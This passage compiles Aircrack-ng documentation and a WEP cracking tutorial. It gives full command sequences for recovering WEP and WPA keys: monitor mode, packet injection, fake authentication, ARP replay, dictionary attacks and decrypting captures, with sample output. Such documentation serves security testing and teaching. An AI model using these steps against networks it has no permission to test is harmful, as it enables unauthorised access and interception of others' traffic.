 Index number of target network ? 

Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:

                               Aircrack-ng 1.4


                 [00:00:03] 230 keys tested (73.41 k/s)


                         KEY FOUND! [ biscotte ]


    Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 
                     39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE 

    Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49 
                     73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 
                     AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 
                     D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD 

    EAPOL HMAC     : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD 

Now you have the passphrase and can connect to the network.
SIMD

Aircrack-ng is compiled with multiple optimizations based on CPU features we call crypto engines. CPU features are different based on the type of CPU.

On x86 (and 64 bit), typically SSE2, AVX and AVX2 are available (AVX512 can be compiled in but it should only be done if the current CPU supports it). On ARM, neon and ASIMD are usually available and on PowerPC, ASIMD and altivec. A generic optimization is always available no matter what architecture it is compiled on or for. A limited set of optimizations may be available depending on the OS/CPU/compilers available.

When running aircrack-ng, it will load the fastest optimization based on what your CPU supports. For package maintainers, it is very useful as they don't have to target the one supporting all the CPU which would be the slowest.

In order to override, the option --simd can be used. Such as

aircrack-ng --simd=avx wpa.cap -w password.lst

In order to list all the available SIMD optimization, use --simd-list. Such as

aircrack-ng --simd-list

will display avx2 avx sse2 generic on x86.
Cracking session

Cracking can sometimes take a very long time and it is sometimes necessary to turn off the computer or put it to sleep for a while. In order to handle this kind of situation, a new set of option has been created.

It will create and/or update a session file saving the current status of the cracking (every 10 minutes) as well as all the options used, wordlists and capture files used. Multiple wordlists can be used and it works with WEP and WPA.

aircrack-ng --new-session current.session -w password.lst,english.txt wpa-01.cap 

In order to restore the session, use --restore-session:

aircrack-ng --restore-session current.session

It will keep updating current.session every 10 minutes.

Limitations:

    The wordlist must be files. For now, they cannot be stdin or airolib-ng databases
    Session has to be restored from the same directory as when first using --new-session
    No new options can be added when restoring session

Usage Tips
General approach to cracking WEP keys

FIXME This needs updating for v1.x!

Clearly, the simplest approach is just to enter aircrack-ng captured-data.cap and let it go. Having said that, there are some techniques to improve your chances of finding the WEP key quickly. There is no single magic set of steps. The following describes some approaches which tend to yield the key faster. Unless you are comfortable with experimentation, leave well enough alone and stick to the simple approach.

If you are capturing arp request/reply packets, then the fastest approach is to use aircrack-ng -z <data packet capture files>. You can then skip the balance of this section since it will find the key very quickly assuming you have collected sufficient arp request/reply packets! NOTE: -z is the default attack mode in aircrack-ng v1.x; use -K to revert to the attack mode used in previous versions.

The overriding technique is capture as much data as possible. That is the single most important task. The number of initialization vectors (IVs) that you need to determine the WEP key varies dramatically by key length and access point. Typically you need 250,000 or more unique IVs for 64 bit keys and 1.5 million or more for 128 bit keys. Clearly a lot more for longer key bit lengths. Then there is luck. There will be times that the WEP key can be determined with as few as 50,000 IVs although this is rare. Conversely, there will be times when you will need mulitple millions of IVs to crack the WEP key. The number of IVs is extremely hard to predict since some access points are very good at eliminating IVs that lead the WEP key.

Generally, don't try to crack the WEP key until you have 200,000 IVs or more. If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques. Start by trying 64 bit keys aircrack-ng -n 64 captured-data.cap. If they are using a 64 bit WEP, it can usually be cracked in less then 5 minutes (generally less then 60 seconds) with relatively few IVs. It is surprising how many APs only use 64 bit keys. If it does not find the 64 bit key in 5 minutes, restart aircrack in the generic mode: aircrack-ng captured-data.cap. Then at each 100,000 IVs mark, retry the aircrack-ng -n 64 captured-data.cap for 5 minutes.

Once you hit 600,000 IVs, switch to testing 128 bit keys. At this point it is unlikely (but not impossible) that it is a 64 bit key and 600,000 IVs did not crack it. So now try aircrack-ng captured-data.cap.

Once you hit 2 million IVs, try changing the fudge factor to -f 4. Run for at least 30 minutes to one hour. Retry, increasing the fudge factor by adding 4 to it each time. Another time to try increasing the fudge factor is when aircrack-ng stops because it has tried all the keys.

All the while, keep collecting data. Remember the golden rule, the more IVs the better.

Also check out the next section on how to determine which options to use as these can significantly speed up cracking the WEP key. For example, if the key is all numeric, then it can take as few as 50,000 IVs to crack a 64 bit key with the -t versus 200,000 IVs without the -t. So if you have a hunch about the nature of the WEP key, it is worth trying a few variations.
How to determine which options to use

While aircrack-ng is running, you mostly just see the beginning of the key. Although the secret WEP key is unknown at this point, there may be clues to speed things up. If the key bytes have a fairly large number of votes, then they are likely 99.5% correct. So lets look at what you can do with these clues.

If the bytes (likely secret keys) are for example: 75:47:99:22:50 then it is quite obvious, that the whole key may consist only of numbers, like the first 5 bytes. So it MAY improve your cracking speed to use the -t option only when trying such keys. See Wikipedia Binary Coded Decimal for a description of what characters -t looks for.

If the bytes are 37:30:31:33:36 which are all numeric values when converted to Ascii, it is a good idea to use -h option. The FAQ entry Converting hex characters to ascii provides links to determine if they are all numeric.

And if the first few bytes are something like 74:6F:70:73:65, and upon entering them into your hexeditor or the links provided in the previous sentence, you see that they may form the beginning of some word, then it seems likely an ASCII key is used, thus you activate -c option to check only printable ASCII keys.

If you know the start of the WEP key in hexadecimal, you can enter with the -d parameter. Lets assume you know the WEP key is 0123456789 in hexadecimal then you could use -d 01 or -d 0123, etc.

Another option to try when having problems determining the WEP key, is the -x2 option which causes the last two keybytes to be brute forced instead of the default of one.
How to convert the HEX WEP key to ASCII?

See the next entry.
How to use the key

If aircrack-ng determines the key, it is presented to you in hexadecimal format. It typically looks like:

 KEY FOUND! [11:22:33:44:55]

The length will vary based on the WEP bit key length used. See the table above which indicates the number of hexadecimal characters for the various WEP key bit lenghts.

You may use this key without the : in your favorite client. This means you enter 1122334455 into the client and specify that the key is in hexadecimal format. Remember that most keys cannot be converted to ASCII format. If the HEX key is in fact valid ASCII characters, the ASCII will also be displayed.

If you wish to experiment a bit with converting HEX to ASCII, see this FAQ entry.

We do not specifically provide support or the details on how to configure your wireless card to connect to the AP. For linux, this page has an excellent writeup. As well, search the internet for this information regarding linux and Windows systems. As well, see the documentation for your card's wireless client. If you are using linux, check the mailing lists and forums specific to the distribution.

Additionally, Aircrack-ng prints out a message indicating the likelihood that the key is correct. It will look something similar to Probability: 100%. Aircrack-ng tests the key against some packets to confirm the key is correct. Based on these tests, it prints the probability of a correct key.

Also remember we do not support or endorse people accessing networks which do not belong to them.
How to convert the hex key back to the passphrase?

People quite often ask if the hexadecimal key found by aircrack-ng can be converted backwords to the original passphrase. The simple answer is NO.

To understand why this is so, lets take a look at how these passphrases are converted into the hexadecimal keys used in WEP.

Some vendors have a wep key generator which translates a passphrase into a hexadecimal WEP key. There are no standards for this. Very often they just pad short phrases with blanks, zeroes or other characters. However, usually the passphrases are filled with zeros up to the length of 16 bytes, and afterwards the MD5SUM of this bytestream will be the WEP Key. Remember, every vendor can do this in a slightly different way, and so they may not be compatible.

So there is no way to know the how long the original passphrase was. It could as short as one character. It all depends on the who developed the software.

Knowing all this, if you still wish to try to obtain the original passphrase, Latin SuD has a tool which attempts reverse the process. Click here for the tool.

Nonetheless, these passphrases result in a WEP Key that is as easily cracked as every other WEP Key. The exact conversion method really does not matter in the end.

Keep in mind that wep passwords that look like plain text might either be ASCII or PASSPHRASE. Most (all) systems support ASCII and are the default, but some support passphrase and those which support it require users to specify whether it's ascii or a passphrase. Passphrases can be any arbitrary length. ASCII are usually limited to 5 or 13 (wep40 and wep104).

As a side note, Windows WZC only supports fixed length hex or ascii keys, so the shortest inputable key is 5 characters long. See the table above on this page regarding how many characters are needed for specific key lengths.
Sample files to try

There are a number of sample files that you can try with aircrack-ng to gain experience:

    wpa.cap: This is a sample file with a wpa handshake. It is located in the test directory of the install files. The passphrase is biscotte. Use the password file (password.lst) which is in the same directory.
    wpa2.eapol.cap: This is a sample file with a wpa2 handshake. It is located in the test directory of the install files. The passphrase is 12345678. Use the password file (password.lst) which is in the same directory.
    test.ivs: This is a 128 bit WEP key file. The key is AE:5B:7F:3A:03:D0:AF:9B:F6:8D:A5:E2:C7.
    ptw.cap: This is a 64 bit WEP key file suitable for the PTW method. The key is 1F:1F:1F:1F:1F.
    wpa-psk-linksys.cap: This is a sample file with a WPA1 handshake along with some encrypted packets. Useful for testing with airdecap-ng. The password is dictionary.
    wpa2-psk-linksys.cap: This is a sample file with a WPA2 handshake along with some encrypted packets. Useful for testing with airdecap-ng. The password is dictionary.

Dictionary Format

Dictionaries used for WPA/WPA bruteforcing need to contain one passphrase per line.

The linux and Windows end of line format is slightly different. See this Wikipedia entry for details. There are conversion tools are available under both linux and Windows which can convert one format to another. As well, editors are available under both operating systems which can edit both formats correctly. It is up to the reader to use an Internet search engine to find the appropriate tools.

However both types should work with the linux or Windows versions of aircrack-ng. Thus, you really don't need to convert back and forth.
Hexadecimal Key Dictionary

Although it is not part of aircrack-ng, it is worth mentioning an interesting piece of work is by SuD. It is basically a wep hex dictionary already prepared and the program to run it:

 https://www.latinsud.com/pub/wepdict/

Tools to split capture files

There are times when you want to split capture files into smaller pieces. For example, files with a large number of IVs can sometimes cause the PTW attack to fail. In this case, it is worth splitting the file into smaller pieces and retrying the PTW attack.

So here are two tools to split capture files:

    https://www.badpenguin.co.uk/files/pcap-util
    https://www.badpenguin.co.uk/files/pcap-util2

Another technique is to use Wireshark / tshark. You can mark packets then same them to a separate file.
How to extract WPA handshake from large capture files

Sometimes you have a very large capture file and would like to extract the WPA/WPA2 handshake packets from it to a separate file. The can be done with tshark which is a command line version of the Wireshark suite. Installing the linux version of the Wireshark suite on your system should also install tshark.

The following command will extract all handshake and beacon packets from your pcap capture file and create a separate file with just those packets:

 tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x08" -w <output file name>

Remember you must use a pcap file as input, not an IVs file.
Other Tips

To specify multiple capture files at a time you can either use a wildcard such as * or specify each file individually.

Examples:

    aircrack-ng -w password.lst wpa.cap wpa2.eapol.cap
    aircrack-ng *.ivs
    aircrack-ng something*.ivs

To specify multiple dictionaries at one time, enter them comma separated with no spaces.

Examples:

    aircrack-ng -w password.lst,secondlist.txt wpa2.eapol.cap
    aircrack-ng -w firstlist.txt,secondlist.txt,thirdlist.txt wpa2.eapol.cap

Aircrack-ng comes with a small dictionary called password.lst. The password.lst file is located in the test directory of the source files. This FAQ entry has a list of web sites where you can find extensive wordlists (dictionaries). Also see this thread on the Forum.

Determining the WPA/WPA2 passphrase is totally dependent on finding a dictionary entry which matches the passphrase. So a quality dictionary is very important. You can search the Internet for dictionaries to be used. There are many available.

The tutorials page has the following tutorial How to crack WPA/WPA2? which walks you through the steps in detail.

As you have seen, if there are multiple networks in your files you need to select which one you want to crack. Instead of manually doing a selection, you can specify which network you want by essid or bssid on the command line. This is done with the -e or -b parameters.

Another trick is to use John the Ripper to create specific passwords for testing. Lets say you know the passphrase is the street name plus 3 digits. Create a custom rule set in JTR and run something like this:

 john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

Remember that valid passwords are 8 to 63 characters in length. Here is a handy command to ensure all passwords in a file meet this criteria:

 awk '{ if ((length($0) > 7) && (length($0) < 64)){ print $0 }}' inputfile

or

 grep -E '^.{8,63}$' < inputfile

Usage Troubleshooting
Error message "Please specify a dictionary (option -w)"

This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.
Error message "fopen(dictionary)failed: No such file or directory"

This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.
Negative votes

There will be times when key bytes will have negative values for votes. As part of the statistical analysis, there are safeguards built in which subtract votes for false positives. The idea is to cause the results to be more accurate. When you get a lot of negative votes, something is wrong. Typically this means you are trying to crack a dynamic key such as WPA/WPA2 or the WEP key changed while you were capturing the data. Remember, WPA/WPA2 can only be cracked via a dictionary technique. If the WEP key has changed, you will need to start gathering new data and start over again.
"An ESSID is required. Try option -e" message

You have successfully captured a handshake then when you run aircrack-ng, you get similar output:

 Opening wpa.cap
 Read 4 packets.
 
          #     BSSID                      ESSID                   ENCRYPTION
          1     00:13:10:F1:15:86                                WPA (1) handshake
 Choosing first network as target.
 
 An ESSID is required. Try option -e.

Solution: You need to specify the real essid, otherwise the key cannot be calculated, as the essid is used as salt when generating the pairwise master key (PMK) out of the pre-shared key (PSK).

So just use -e <REAL_ESSID> instead of -e  and aircrack-ng should find the passphrase.
The PTW method does not work

One particularly important constraint is that it only works against arp request/reply packets. It cannot be used against any other data packets. So even if your data capture file contains a large number of data packets, if there insufficient arp request/reply packets, it will not work. Using this technique, 64-bit WEP can be cracked with as few as 20,000 data packets and 128-bit WEP with 40,000 data packets. As well, it requires the full packet to be captured. Meaning you cannot use the -- ivs option when running airodump-ng. It also only works for 64 and 128 bit WEP encryption.
Error message "read(file header) failed: Success"

If you get the error message - read(file header) failed: Success or similar when running aircrack-ng, there is likely an input file with zero (0) bytes. The input file could be a .cap or .ivs file.

This is most likely to happen with wildcard input of many files such as:

 aircrack-ng -z -b XX:XX:XX:XX:XX:XX *.cap

Simply delete the files with zero bytes and run the command again.
WPA/WPA2 Handshake Analysis Fails

Capturing WPA/WPA2 handshakes can be very tricky. A capture file may end up containing a subset of packets from various handshake attempts and/or handshakes from more then one client. Currently aircrack-ng can sometimes fail to parse out the handshake properly. What this means is that aircrack-ng will fail to find a handshake in the capture file even though one exists.

If you are sure your capture file contains a valid handshake then use Wireshark or an equivalent piece of software and manually pull out the beacon packet plus a set of handshake packets. 

################################################################

Aigraph-ng

Author: digitalpsyko, TheX1le
Version: 1.01
Last modified on: 23/5/2010
Requirements

    python
    graphviz
    make
    aircrack-ng 1.0 (rc2 or better is recommended)
    psyco is recommended but not mandatory

Installing

git clone http://github.com/aircrack-ng/aircrack-ng
cd aircrack-ng
autoreconf -i
./configure
cd scripts/airgraph-ng
make install

Graph types

    CAPR: Client to AP Relationship. This shows all the clients attached to a particular AP.
    CPG: Common Probe Graph. This will show all probed SSID by clients.

Usage
Help screen

############################################
#         Welcome to Airgraph-ng           #
############################################

Usage: python airgraph-ng -i [airodumpfile.txt] -o [outputfile.png] -g [CAPR OR CPG]

-i      Input File
-o      Output File
-g      Graph Type [CAPR (Client to AP Relationship) OR CPG (Common probe graph)]
-a      Print the about
-h      Print this help

Creating graphs

Now that you've got your nifty new program installed, its time to run some airodump-ng CSV files through it so you can see the graphs this program creates. So you have airodump-ng .txt/.csv files to run through airgraph-ng goto your favorite terminal and cd into the directory where you're keeping them.

The following creates a Client to Access point Relationship Graph

airgraph-ng -i demo.csv -o demo.png -g CAPR

The following creates a Client to Probe Request Graph

airgraph-ng -i demo.csv -o demo.png -g CPG

The graph size and the time to generate it depends on the size of your CSV file. So, the more AP's and Clients you get with airodump-ng the bigger the graph it will be.
Combining CSV files

To combine your airodump-ng .txt/.csv files together simply open up a terminal and cd into the directory where you're keeping them in and then type:

dump-join.py -i <file>.txt <file>.txt <file>.txt -o <outputfilename>.txt  

Now you can take your combined airodump-ng .txt/.csv files and run it through airgraph-ng to make a larger graph.
Troubleshooting
Airodump-ng doesn't create .txt files anymore

Starting from aircrack-ng 1.0rc3, .txt files were renamed to .csv.
I get 'Psyco optimizer not installed, You may want to download and install it!'

This is just a warning and you can safely ignore this message. However, it is recommended install psyco because it speeds up execution of python code.

################################################################

Airdecap-ng
Description

With airdecap-ng you can decrypt WEP/WPA/WPA2 capture files. As well, it can also be used to strip the wireless headers from an unencrypted wireless capture.

It outputs a new file ending with -dec.cap which is the decrypted/stripped version of the input file.
Usage

airdecap-ng [options] <pcap file>

Option	Param.	Description
-l		don't remove the 802.11 header
-b	bssid	access point MAC address filter
-k	pmk	WPA/WPA2 Pairwise Master Key in hex
-e	essid	target network ascii identifier
-p	pass	target network WPA/WPA2 passphrase
-w	key	target network WEP key in hexadecimal

Wildcards may be used on the input file name providing it only matches a single file. In general, it is recommended that you use a single file name as input, not wildcarding.
Usage Examples

The following removes the wireless headers from an open network (no WEP) capture:

airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

The following decrypts a WEP-encrypted capture using a hexadecimal WEP key:

airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap

The following decrypts a WPA/WPA2 encrypted capture using the passphrase:

airdecap-ng -e 'the ssid' -p passphrase  tkip.cap

Usage Tips
WPA/WPA2 Requirements

The capture file must contain a valid four-way handshake. For this purpose having (packets 2 and 3) or (packets 3 and 4) will work correctly. In fact, you don't truly need all four handshake packets.

As well, only data packets following the handshake will be decrypted. This is because information is required from the handshake in order to decrypt the data packets.
How to use spaces, double quote and single quote in AP names?

################################################################
Tutorial: Simple WEP Crack

Version: 1.20 January 11, 2010
By: darkAudax
Introduction

This tutorial walks you though a very simple case to crack a WEP key. It is intended to build your basic skills and get you familiar with the concepts. It assumes you have a working wireless card with drivers already patched for injection.

The basic concept behind this tutorial is using aireplay-ng replay an ARP packet to generate new unique IVs. In turn, aircrack-ng uses the new unique IVs to crack the WEP key. It is important to understand what an ARP packet is. This "What is an ARP?" section provides the details.

For a start to finish newbie guide, see the Linux Newbie Guide. Although this tutorial does not cover all the steps, it does attempt to provide much more detailed examples of the steps to actually crack a WEP key plus explain the reason and background of each step. For more information on installing aircrck-ng, see Installing Aircrack-ng and for installing drivers see Installing Drivers.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
Assumptions

First, this solution assumes:

    You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding.
    You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you may will be able to transmit packets to the AP. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP by following these instructions.
    There is at least one wired or wireless client connected to the network and they are active. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets.
    You are using v0.9 of aircrack-ng. If you use a different version then some of the common options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.
Equipment used

In this tutorial, here is what was used:

    MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
    BSSID (MAC address of access point): 00:14:6C:7E:40:80
    ESSID (Wireless network name): teddy
    Access point channel: 9
    Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Solution
Solution Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Once we have captured a large number of IVs, we can use them to determine the WEP key.

Here are the basic steps we will be going through:

    Start the wireless interface in monitor mode on the specific AP channel
    Test the injection capability of the wireless device to the AP
    Use aireplay-ng to do a fake authentication with the access point
    Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs
    Start aireplay-ng in ARP request replay mode to inject packets
    Run aircrack-ng to crack key using the IVs collected

Step 1 - Start the wireless interface in monitor mode on AP channel

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only hear packets addressed to you. By hearing every packet, we can later select some for injection. As well, only (there are some rare exceptions) monitor mode allows you to inject packets. (Note: this procedure is different for non-Atheros cards.)

First stop ath0 by entering:

 airmon-ng stop ath0   

The system responds:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Substitute the channel number that your AP runs on for 9 in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly.

Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used. For other drivers, use the wireless interface name. Examples: wlan0 or rausb0.

The system will respond:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that ath0 is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter iwconfig.

The system will respond:

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
Step 2 - Test Wireless Device Packet Injection

The purpose of this step ensures that your card is within distance of your AP and can inject packets to it.

Enter:

 aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0

Where:

    -9 means injection test
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    ath0 is the wireless interface name

The system should respond with:

 09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 09:23:35  Trying broadcast probe requests...
 09:23:35  Injection is working!
 09:23:37  Found 1 AP 
 
 09:23:37  Trying directed probe requests...
 09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
 09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
 09:23:39  30/30: 100%

The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.

See the injection test for more details.
Step 3 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.

Open another console session to capture the generated IVs. Then enter:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Where:

    -c 9 is the channel for the wireless network
    --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic.
    -w capture is file name prefix for the file which will contain the IVs.
    ath0 is the interface name.

While the injection is taking place (later), the screen will look similar to this:

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  

Step 4 - Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a DeAuthentication packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.

To associate with an access point, use fake authentication:

 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

    -1 means fake authentication
    0 reassociation timing in seconds
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:0F:B5:88:AC:82 is our card MAC address
    ath0 is the wireless interface name

Success looks like:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

    6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive packets to be sent.
    -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
    -q 10 - Send keep alive packets every 10 seconds.

Success looks like:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

Here is an example of what a failed authentication looks like:

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request

Notice the Got a deauthentication packet and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.
Troubleshooting Tips

    Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and

Run: tcpdump -n -vvv -s0 -e -i <interface name> | grep -i -E (RA:<MAC address of your card>|Authentication|ssoc)

You would then look for error messages.

    If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and

Run: tcpdump -n -e -s0 -vvv -i ath0

Here is a typical tcpdump error message you are looking for:

 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: tcpdump -n -e -s0 -vvv -i ath0 | grep -i DeAuth. You may need to tweak the phrase DeAuth to pick out the exact packets you want.
Step 5 - Start aireplay-ng in ARP request replay mode

The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. For an explanation of ARP, see this PC Magazine page or Wikipedia. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.

Open another console session and enter:

 aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says got 0 ARP requests after waiting a long time.

Here is what the screen looks like when ARP requests are being injected:

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The #/s should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.
Troubleshooting Tips

    If you receive a message similar to Got a deauth/disassoc packet. Is the source mac associated?, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 3) and successfully associate with the AP.

Step 6 - Run aircrack-ng to obtain the WEP key

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.

Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. If this is the case, then you can include -n 64 to limit the checking of keys to 64 bits.

Two methods will be shown. It is recommended you try both for learning purposes. By trying both methods, you will see quickly the PTW method successfully determines the WEP key compared to the FMS/Korek method. As a reminder, the PTW method only works successfully with arp request/reply packets. Since this tutorial covers injection of ARP request packets, you can properly use this method. The other requirement is that you capture the full packet with airodump-ng. Meaning, do not use the --ivs option.

Start another console session and enter:

 aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:

    -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
    output*.cap selects all files starting with output and ending in .cap.

To also use the FMS/Korek method, start another console session and enter:

 aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap

Where:

    -K invokes the FMS/Korek method
    -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
    output*.cap selects all files starting with output and ending in .cap.

If you are using 1.0-rc1, add the option -K for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.)

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.

Here is what success looks like:

                                              Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
